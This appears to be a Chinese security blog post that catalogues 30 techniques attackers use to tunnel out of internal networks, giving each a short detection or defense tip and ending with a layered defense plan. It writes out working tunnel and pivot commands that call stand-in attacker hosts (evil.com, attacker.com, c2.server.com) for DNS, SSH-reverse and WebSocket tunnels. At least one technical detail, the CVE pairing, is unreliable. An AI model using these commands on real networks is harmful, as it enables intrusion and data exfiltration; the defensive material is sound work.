在攻防对抗中，内网穿透是突破网络边界的关键技术。本文从攻击者视角系统梳理30种实战穿透手法，涵盖协议滥用、云原生穿透、IoT设备渗透等新兴攻击面，并给出企业级防御方案。

一、协议隧道技术（8种）

1. SSH动态端口转发

原理：建立加密Socks5代理

ssh -D 1080 -p 2222 user@jump_host -Nf

检测：非标准端口SSH长连接监控

2. ICMP隐蔽隧道

工具：PingTunnel

ptunnel -p 1.1.1.1 -lp 9001 -da 10.10.10.2 -dp 3389

特征：异常ICMP载荷长度（>64字节）

3. DNS TXT隧道

实施：

dnscat2 --dns domain=evil.com --secret=key --max-length=255

防御：限制TXT记录查询频率

4. HTTP分片流隧道

技术点：

• • 利用Transfer-Encoding: chunked分片传输
• • 伪装Content-Type为image/jpeg
  检测：HTTP头与载荷类型不匹配

5. RDP网关中间人穿透

手法：

1. 1. 劫持RDP Gateway服务
2. 2. 修改TargetAddress参数重定向会话
   工具：rdp-tunnel

6. SMTP邮件路由穿透

步骤：

1. 1. 控制内部Exchange服务器
2. 2. 构造特殊邮件头实现流量转发：

X-Proxy: http://attacker.com:8080

7. WebSocket SSL隧道

实现：

websocat -E wss://c2.server.com tcp-listen:0.0.0.0:443

检测：SSL证书指纹异常

8. QUIC协议穿透

优势：

• • 基于UDP绕过传统防火墙检测
• • 0-RTT快速重连特性
  工具：quic-tunnel

二、代理转发体系（6种）

9. Socks5多级跳板链

proxychains4 -q nmap -sT -Pn 10.10.10.0/24

防御：出口流量协议白名单

10. SSH反向端口转发

ssh -R 0.0.0.0:3306:localhost:3306 user@attacker.com

检测：服务器监听非常见端口

11. Ngrok穿透内网服务

配置：

tunnels:
  web:
    proto:http
    addr:8080
    subdomain:internal

特征：*.ngrok.io域名访问

12. Frp多协议转发

架构：

[frpc] <-> [frps] <-> [Attacker]

隐蔽性：使用STCP模式避免暴露端口

13. 基于CDN的HTTPS穿透

步骤：

1. 1. 在Cloudflare Workers部署代理脚本
2. 2. 利用Workers KV存储加密隧道配置
   检测：CDN回源IP异常

14. 域前置技术（Domain Fronting）

实现：

Host: google.com
X-Forwarded-Host: evil.com

防御：禁用SNI代理服务

三、云原生穿透（5种）

15. 云函数反向代理

流程：

1. 1. 创建AWS Lambda函数
2. 2. 绑定API Gateway作为入口
3. 3. 通过Event参数传递加密指令
   防御：限制云函数出站流量

16. 容器Sidecar流量劫持

手法：

1. 1. 篡改K8s Pod的iptables规则
2. 2. 将流量重定向到恶意Sidecar容器
   检测：容器网络策略基线监控

17. 服务网格穿透（Istio）

利用：

• • 修改VirtualService路由规则
• • 注入恶意Envoy Filter
  工具：meshtunnel

18. 云数据库穿透

案例：

• • 利用MongoDB Atlas VPC Peering
• • 通过Stitch Functions建立通道
  防御：启用数据库网络隔离

19. 云存储桶穿透

步骤：

1. 1. 创建AWS S3静态网站
2. 2. 利用JavaScript发起反向连接
   检测：存储桶跨域策略审计

四、高级渗透战术（11种）

20. 打印机协议内存驻留

利用：

• • PJL语言执行系统命令
• • 通过LPD协议回传数据
  工具：PRET

21. 工控Modbus TCP隧道

特征：

• • 使用功能码16（写多寄存器）传输数据
• • 伪造PLC设备标识符
  检测：工业协议深度解析

22. 虚拟化平台VNIC逃逸

手法：

• • VMware ESXi vSwitch策略绕过
• • Hyper-V虚拟网卡混杂模式滥用
  CVE：CVE-2021-21974

23. 智能家居MQTT代理穿透

配置：

mosquitto_sub -t 'home/#' -h broker.example.com | nc 10.1.1.100 22

防御：MQTT TLS双向认证

24. 无线Mesh网络跨VLAN渗透

工具：

• • mesh-tunneler
• • 利用OLSR协议漏洞
  检测：无线频谱行为分析

25. 区块链P2P网络桥接

实现：

1. 1. 创建恶意以太坊节点
2. 2. 通过devp2p协议建立隧道
   特征：异常ENR记录传播

26. 邮件客户端穿透（Outlook）

利用：

• • 宏代码调用WinHTTP对象
• • 通过邮件规则自动转发
  检测：OLE对象行为监控

27. 浏览器WebRTC穿透

代码：

const pc = newRTCPeerConnection();
pc.createDataChannel("tunnel");

防御：禁用STUN服务

28. 虚拟货币矿池穿透

手法：

• • 伪造Stratum协议消息
• • 利用矿机固件后门
  工具：miner-proxy

29. 生物识别设备穿透

案例：

• • 指纹考勤机TCP 4370端口转发
• • 人脸识别终端RTSP流重定向
  检测：生物设备协议白名单

30. 0day漏洞定制化穿透

特征：

• • 结合目标系统特性开发专用隧道工具
• • 利用未公开的协议解析漏洞
  防御：内存保护技术（ASLR/DEP）

五、防御体系五层架构

1. 1. 网络层
• • 微分段策略（NSX/Calico）
• • 动态端口随机化
2. 2. 主机层
• • 系统调用审计（eBPF）
• • 容器镜像签名验证
3. 3. 应用层
• • 协议白名单（DPI）
• • TLS客户端证书认证
4. 4. 云原生层
• • 服务网格mTLS
• • 云API操作审计
5. 5. 物理层
• • 工业网络物理隔离
• • 无线频谱行为分析

阅读原文：原文链接